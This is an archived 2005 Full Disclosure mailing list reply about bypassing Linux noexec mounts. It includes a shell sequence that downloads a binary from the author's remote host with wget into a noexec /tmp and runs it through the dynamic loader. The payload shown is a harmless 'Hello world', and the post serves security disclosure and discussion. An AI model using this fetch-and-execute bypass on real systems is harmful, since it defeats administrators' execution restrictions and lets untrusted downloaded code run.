Full Disclosure mailing list archives
Re: linux bugs (survival stories)?
From: Eduardo Tongson <propolice () gmail com>
Date: Tue, 12 Apr 2005 22:21:43 +0000
#include <stdio.h> int main(int argc, char *argv[]) { printf("Hello world!\n"); return 0; }
"like for example" is always a bad way to discuss things, because it's unclear what exactly you're talking about. ;)
ok ;)
Now, going with specifics... The last really big "trivial" issue with bypassing noexec on mounted filesystems was closed by a patch from Ulrich Drepper in 2.6.0 - basically forcing you to mmap() the binary in and then mprotect() it to add the exec flag. And at *that* point, it gets ugly, because even if you stop them from calling mprotect() to get it executable, they can still use some variant of "unexec()" (see the Emacs/XEmacs source tree) to dump it out, twiddle the headers, and then exec() it off some other file system. So what specific issue with noexec are *you* thinking of, and what is your proposed fix for it?
'hello world' can bypass noexec just remove the executable flags from the program headers the compiled binary don't even need to have executable permissions #include <stdio.h> int main(int argc, char *argv[]) { printf("Hello world!\n"); return 0; } % sudo mount -o remount,noexec /tmp % wget http://pornadmin.net/~tongson/linux/helloworld.bin -O /tmp/helloworld.bin % /lib/ld-linux.so.2 /tmp/helloworld.bin Hello world! -- Eduardo Tongson <pornadmin.net/~tongson> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- linux bugs (survival stories)? Bipin Gautam (Apr 11)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? Georgi Guninski (Apr 12)
- Re: linux bugs (survival stories)? dk (Apr 12)
- Re: linux bugs (survival stories)? Eduardo Tongson (Apr 12)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? Eduardo Tongson (Apr 12)
- Re: linux bugs (survival stories)? Joachim Schipper (Apr 12)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? Eduardo Tongson (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- <Possible follow-ups>
- Re: linux bugs (survival stories)? pageexec (Apr 12)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? pageexec (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 13)
- Re: linux bugs (survival stories)? pageexec (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 13)
- Re: linux bugs (survival stories)? pageexec (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)